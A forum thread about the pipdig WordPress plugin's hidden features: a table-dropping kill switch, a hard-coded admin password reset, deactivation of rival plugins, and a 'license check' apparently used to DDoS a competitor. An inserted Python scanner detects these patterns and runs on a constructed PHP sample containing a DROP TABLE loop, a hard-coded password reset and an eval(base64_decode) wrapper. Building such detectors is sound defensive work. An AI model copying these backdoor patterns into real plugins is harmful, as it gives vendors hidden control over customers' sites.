> Another one from the @pipdig plugin. If you use one of their themes on @bluehost then they intentionally slow your website down by disabling the BlueHost cache plugin, then they can inject content with the title "Is your host slowing you down?"
While the call to switch hosts is malicious, almost every developer in the WordPress world will agree that BlueHost, and their parent company with all their 50+ hosting companies, are utter garbage. The only reason they exist is because they have hired an army of bloggers and pay them affiliate income of $65 / signup.
As far as disabling Endurance Cache goes, it is completely legitimate. It's a plugin forced upon BlueHost users, without being told so, and is a "must-use" plugin that most users will never check (and can't be completely disabled from WordPress admin).
Wait... so if I write a WP plugin, I'm entitled to disable other plugins I don't like when people install mine? Of course not. That endurance cache is not the only one, there's a list of "plugins we disagree with" which are disabled:
As for hosting providers: GoDaddy, BlueHost, etc - yes, they're all bad. But that doesn't justify moves like these.
Serious question though, on the technical part: WP needs an advanced-cache.php file, which needs to be in wp-content in order for the cache to work; this will be listed as a drop-in.
Are you sure the Endurance cache is MU and not a drop-in? (Genuine question.)
Which is why I stated it's a tangent about BlueHost and I definitely don't agree with disabling other plugins.
However, I believe it's perfectly valid to disable a forced plugin. If a host forced enabled an almost hidden plugin, without user consent [1], then it's no more evil to undo the evil for the good of users.
As for drop-in vs mu, every other cache plugin itself stays a normal plugin so it's not a technical limitation. That's beside the point though, the plugin is force enabled without user consent.
Well... the thing with a hosted service is the host needs to protect their arses as well, and WP resource abuse can get fascinating - a mandatory cache plugin is not _that_ bad. It's not The Right Way, but shipping WP without enabled cache or a full page cache isn't either.
I actually understand this perspective, having hosted WordPress sites and having written a WordPress cache plugin myself.
I'm curious which host you'd recommend. I want a good host for making websites. Not sure if I need to be a reseller or just use their shared hosting. I'm hoping to create lots of static websites for different small businesses, and then cheaply host them. Considering Namecheap, DreamHost, and BlueHost, but I'm also hoping there's one that allows nudity (not porn, just artistic nudity). Or if there's a host that allows any content, that's a plus.
I've been trying to find non-Amazon or non-Google hosting options, wanting to spend my money elsewhere. Is this a waste of time or effort? I imagine that cloud hosting with Google would be less restrictive, though more complicated to setup.
NearlyFreeSpeech.NET has strong free-speech policies. But they do expect you to be technically competent. If you're not comfortable with the command line and wp-cli (if you're using WordPress), you probably won't be happy with them.
If you checked them out years ago, they've since added support for custom HTTP servers. It's not as flexible as a VPS, but they're no longer limited to static files, PHP, or CGI. You can now run Django, Ruby-on-Rails, etc.
It's pretty much the same as if it was hardcoded, it drops all tables that have a name starting with the WP prefix. It's extremely ugly, but it's not unsafe (if your plan is removing all WP related tables from the DB).
And this just illustrates the horror that is the proprietary marketplace of WordPress plugins. It is annoying because this results in incentives to take away freedom from users and require payment for proprietary code in the guise of a free software project. To expand WordPress functionality beyond the core functions you have to wade through a minefield of freemium plugins that have all been slightly broken to encourage you to shell out money to someone for code you won't have any freedom with, and the worst of it is possibly demonstrated by code like this. I have built some sites with WordPress but I have always felt stifled by the way the plugins and themes are distributed. On the other hand, I understand people like being able to charge money and create businesses from the code they write, which can be more challenging if you actually write free-as-in-libre software vs. attempting to extract money from every potential user.
For my personal site, I left WP behind about 3 years ago. I had to go back last month, trying to build something instead of a Wix site for a school, and the experience was terrifying: after adding one of the events plugins, within 5 minutes I started getting spam registrations. All plugins have ugly admin interface "extras" and are very pushy to get you to buy them.
The WordPress of 2007, which I loved very much, has nothing to do with this monster of 2019.
I share a similar sentiment. Since about 2-3 years ago, most WordPress plugins are marketed bloatware that messes up the entire dashboard UI. And don't get me started on plugins that don't let you close their notifications unless you do "some thing".
It really is a shame, because frankly speaking - most of these plugins are utter trash anyway.
I've tried out a massive amount of gutenberg block plugins; whichever added a new line in the admin menu instead of adding it into a submenu of settings, deserves immediate deletion.
You get what you pay for with WordPress plugins. There are some great free ones that are maintained.
Then you get ones that can't survive minor WordPress upgrades, or are full of security holes.
The worst is when you have a highly motivated person who throws a ton of them together to build a website, and then it languishes and becomes out of date, and any upgrading you do will start culling plugins from their baby.
> And this just illustrates the horror that is the proprietary market place of WordPress plugins.
Same stories emanate from the Google Play marketplace, and to a lesser extent the highly curated Apple app store marketplace. How is WordPress any different?
> you have to wade through a minefield of freemium plugins
Just like every other app store.
> for code you won't have any freedom with
Unlike smartphone apps, or apps for my PC I can and do inspect the source code of any WordPress plugin or theme.
> I have built some sites with WordPress but I have always felt stifled by the way the plugins and themes are distributed
I'd feel the same way about platforms I've only been exposed to a few times as well.
Thanks. My crew put this write-up together. We're here if you have any questions. Jem and us published almost at the same time although I think we beat her by an hour or so. We're in contact. Funny coincidence we were working on the same story at the same time.
This has blown up on Twitter. Our team has stayed out of the online debate mostly other than answering questions. We're trying to just focus on the data here.
They took their public repo offline, but we mirrored it before they did that. It contradicts some claims they're making re timing. We're publishing a timeline tomorrow and are recording our weekly podcast tonight instead of tomorrow as per normal because of this insanity. We'll break it down on the show.
I guess what really jumps out at me here is how they're trying to gaslight the thing.
I'd also like to add that the DDoS functionality isn't what really jumped out at me. It was the ability to reset your site's admin password remotely using a hard-coded password that anyone can read. And then there is also the ability to drop all your tables.
When we contacted them before publishing via email, they explained that someone had been pirating their software so this was a countermeasure. (quote is in the Wordfence post above) I guess the idea was that they would destroy sites using pirated licenses. Then they backpedalled that later on after this went viral.
Depends who you ask. Also some sites use a SaaS model with API key for back-end access. They claimed license keys were stolen.
“Last year we had some serious problems after someone obtained a huge list of license keys and downloaded all of our products. The keys and files were then distributed on their file sharing site, which has since been taken down (not by us, ironically!). The drop tables function was put in place to try to stop this at the time.”
> Wow, peoples' responses on Twitter are even more delusional. Wtf?
I find this so baffling. It's like being shown the bodies of a serial killer's victims, and publicly stating "oh, but he never murdered me, so why are you all complaining?"
They surely do not understand they are looking at bodies. They're seeing a bunch of nerd speak about "DDoS" and "dropping database tables" and their eyes glaze over. But they understand their site looks pretty...
A percentage of the population treats something like this as a personal attack. I have Atari/Sega/Chevy thus Commodore/Nintendo/Ford sucks. I use it, why are you saying those things about X, are you calling me stupid? etc.
If I'm reading this correctly, they're essentially admitting to some of the malicious features described by the researcher, but claiming that they were included for support purposes, or as a way of sabotaging sites using pirated versions of their plugin.
1. Including features which can remotely grant unauthorized access or cause damage to a user's web site is inappropriate under any circumstances. Even if they're your customers, or if they aren't your customers, or whatever. You don't do that.
2. Pipdig hasn't come up with any sensible explanation for why their license checks were pointed at a competitor's web site. It's not even clear why the license check would be architected in a way that allowed for this.
3. Altering user's site content to change links from Blogerize to Pipdig is beyond the pale. Pipdig's explanation of this feature is incoherent; it isn't even consistent with the behavior of the code presented.
4. Obfuscating the code surrounding all of these questionable bits of functionality stinks of wrongdoing. It's understandable for a license check to be a little obfuscated, perhaps, but there's no reason why a remote administration feature should be (even if it had any reason for existing).
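The four items above describe the kinds of behaviour a reviewer would want to spot when reading a plugin's source: a table-dropping "reset", a password reset driven by a hard-coded value, deactivation of other plugins, a "license check" whose response is used as the target of a further request, post-content rewriting, and obfuscation wrappers around all of it. The following is an added example of a heuristic scanner for those patterns; it is not pipdig's code, not the Wordfence tooling, and the PHP it scans is constructed for illustration. The rule names, the `scan` and `summarize` helpers and the sample plugin are all this example's own assumptions.

```python
"""Heuristic static scan of a WordPress plugin's PHP source for the kinds of
behaviour described in this thread: dropping every table under the site's
prefix, resetting a password from a hard-coded value, deactivating other
plugins, relaying requests to a URL fetched from the vendor's server,
rewriting post content, and obfuscation wrappers.

Added example for this thread, not any vendor's code. The PHP below is
CONSTRUCTED for illustration; rule names and helpers are this example's own.
"""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str      # which heuristic fired
    line: int      # 1-based line in the PHP source
    snippet: str   # the offending line, stripped


# One regex per line-local rule. These are prompts for a human reviewer, not
# proof of malice: a legitimate reset plugin also drops tables, and security
# plugins legitimately call deactivate_plugins().
LINE_RULES = [
    ("drop_tables", re.compile(r"\bDROP\s+TABLE\b", re.I)),
    ("tables_enumerated_by_prefix",
     re.compile(r"SHOW\s+TABLES\s+LIKE.*\$wpdb->prefix", re.I)),
    ("hardcoded_password_reset",
     re.compile(r"\bwp_set_password\s*\(\s*['\"]")),
    ("deactivates_other_plugins", re.compile(r"\bdeactivate_plugins\s*\(")),
    ("obfuscation_wrapper",
     re.compile(r"\b(?:eval|base64_decode|gzinflate|str_rot13)\s*\(")),
    # Same-line heuristic: a the_content filter whose callback rewrites text.
    ("content_rewrite_filter",
     re.compile(r"add_filter\s*\(\s*['\"]the_content['\"].*"
                r"\b(?:str_replace|str_ireplace|preg_replace)\s*\(")),
]

# Variable assigned from the body of a remote response.
BODY_ASSIGN = re.compile(r"(\$\w+)\s*=\s*wp_remote_retrieve_body\s*\(")


def _chained_remote_fetch(src: str, lines: list[str]) -> list[Finding]:
    """Flag a remote request whose URL came from the body of an earlier remote
    response: the shape of a 'license check' that can be pointed at any host."""
    out: list[Finding] = []
    for m in BODY_ASSIGN.finditer(src):
        use = re.compile(r"wp_remote_(?:get|post|request)\s*\(\s*"
                         + re.escape(m.group(1)))
        for i, line in enumerate(lines, 1):
            if use.search(line):
                out.append(Finding("request_to_remotely_supplied_url", i, line.strip()))
    return out


def scan(php_source: str) -> list[Finding]:
    """Return every rule hit, ordered by line then rule name."""
    lines = php_source.splitlines()
    found = [Finding(name, i, line.strip())
             for i, line in enumerate(lines, 1)
             for name, pat in LINE_RULES if pat.search(line)]
    found.extend(_chained_remote_fetch(php_source, lines))
    return sorted(found, key=lambda f: (f.line, f.rule))


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count hits per rule, for a quick triage view."""
    return dict(Counter(f.rule for f in findings))


# CONSTRUCTED sample: every name, token and URL here is made up.
SAMPLE_PLUGIN = r"""<?php
// CONSTRUCTED sample plugin, not real code from any vendor.
add_action('init', function () {
    $resp = wp_remote_get('https://vendor.example/license.txt');
    $target = wp_remote_retrieve_body($resp);
    wp_remote_get($target . '?' . rand());   // hits whatever URL the server returned
});
function sample_reset_site() {
    global $wpdb;
    $tables = $wpdb->get_col("SHOW TABLES LIKE '{$wpdb->prefix}%'");
    foreach ($tables as $t) { $wpdb->query("DROP TABLE $t"); }
}
function sample_maybe_reset_admin() {
    if (isset($_GET['k']) && $_GET['k'] === 'constructed-token') {
        wp_set_password('constructed-password', 1);
    }
}
deactivate_plugins('some-cache-plugin/some-cache-plugin.php');
eval(base64_decode('ZWNobyAnaGknOw=='));
add_filter('the_content', function ($c) { return str_replace('competitor.example', 'vendor.example', $c); });
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_PLUGIN):
        print(f"{f.line:>3}  {f.rule:<34} {f.snippet}")
```

Run it against a real plugin directory by concatenating the .php files; the hits are starting points for reading the surrounding code, not verdicts. The chained-fetch rule is the one worth extending: it only follows a body variable passed directly to the next request, so a target laundered through a helper function will need a proper dataflow pass.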
We're just a poor small company... that acts maliciously against our competitors using code we sell to clients who have no idea! We're sorry we got caught and it's hard to explain why this isn't bad.
Oh and they deleted repos apparently, gotta hide the evidence
"But all my customers love and trust me!" == "I'm just an above-average con man."
"But I was just doing this to support them without bothering them!" == "I'm clearly not ready to take responsibility and fess up to anything because I thought my deceptively named functions would fool everybody (and still do)."
"But my girlfriend and I love cat memes!" == "Please, for the love of god, can we forget about all this and talk about cat memes instead?" [I honestly have no clue what he was trying to get at in the first six paragraphs...]
It sounds like they got a little overaggressive fighting with the company that had hijacked their themes and were selling them last year.
They were probably obfuscating those functions to hide them from the people selling their themes. Sounds like they were also disabling this plugin as well.
But they definitely went about things the wrong way, including functions like that and obfuscating them is definitely not the right way to do things.
I think a simple, we're sorry we had included these functions in this manner to combat the company stealing our themes last year. We understand this was wrong and a fresh clean version of the plugin will be out this week.
We will do things the right way from now on, you can trust us and we welcome audits of all our code.
> Firstly, the plugin includes a content filter that automatically replaces references to Blogerize, a service which claims to be a beginner’s blogging course, with references to Pipdig’s own services.
Generally speaking, most WordPress plugins alter the presentation or functionality of a site, not its content. There's some exceptions, like search-and-replace [1], but even in those cases the functionality is made obvious to the user.
> Phil you need to stop with the lies. Not only do you outright lie about having the ability to kill sites with your plugin, you state that this was implemented in response to a security breach you experienced in July 2018. The code was implemented in November 2017.
It looks like the company involved is based in the U.K. and also seems likely this software and their usage of it is a violation of the Computer Misuse Act.
One of their competitors should consider filing a complaint with the relevant authorities, so this gets formally investigated.
Yes, absolutely. The responses so far have been too tepid; DDOSing competitors, adding a database-dropping kill switch, disabling other software, and adding an admin login backdoor are all separate criminal offenses. The developer responsible should not just be blacklisted, he should be in prison.
I would be interested to hear from CloudFlare as to whether there is any possibility of confirming that the URL "https://pipdigz.co.uk/p3/id39dqm3c0_license_h.txt" - fetched by the "license check" code - did at some point return the text "https://kotrynabassdesign.com/wp-admin/admin-ajax.php". I suspect this will be difficult, or impossible, to verify (I'm not a security expert) and the "license check" code in and of itself (while extremely fishy) only betrays the potential of a DDoS and is not a smoking gun.
Hopefully not. Cloudflare has no business in law enforcement or legal investigations. If they are trustworthy, they will not know about the contents of sites in the past.
Tons of WordPress themes and plugins are complete crap - even popular stuff. Nobody reads the code or knows how to read it. It makes claiming bug bounties on WordPress sites easy.
There are many solutions out there that can generate static sites from a WordPress installation. For example, you can use gatsby.js to generate a static site using WordPress as data source.
My point is, if you want the WordPress ecosystem but don't want the associated risk, there are many ways to generate static websites from a WordPress installation. You can run WordPress locally on your development computer and only host the generated static HTML on your server/hosting provider.
Their reply is an exercise in basic obfuscation and dissembling. Instead of explaining the specific 'features' of their code, their response is in a question-and-answer format. They chose the questions, and they are sufficiently broad and otherwise carefully chosen so that they can avoid being specific about what, exactly, they were up to. Some obvious follow-up questions to their initial answers are conspicuously absent.
Being able to drop someone else's full site contents is not something anyone should get away with under any circumstance.
They want to prevent pirated themes - reset the theme to twentysixteen; block frontend access; overlay the frontend with a notification, etc. - so many options. Deleting data? That is not one of them.
I won't even get into the deliberate other plugins disabling with comments like "sorry not sorry", including cache plugins to advertise their own hosting.
> There was a function in an older version of the plugin which could be used to reset a site back to the default settings. This function had no risk of malicious or unintentional use.
> The portrayal of this feature is not based on reality. There is a function in the plugin which can be used to clear database tables, much like a backup or standard reset plugin. To confirm, we do not have the ability to “kill” a site, nor would we ever, ever want to do that! The function is in place to reset a site back to defaults, however it is only activated after being in touch with the site owner.
It dropped all WordPress tables. This is not a reset. There's also no reason to only have PipDig able to do this via their server, vs. an option in the configuration.
They also don't address the password reset functionality.
At best, these people are incompetent and don't realize the power their code wields. At worst, they're just backpedaling and trying to mitigate damage. (I especially like their attempt to humanize themselves by saying they're just four people who like cat memes.)
https://twitter.com/nickstadb/status/1112479746972151808
pipdig is a goldmine.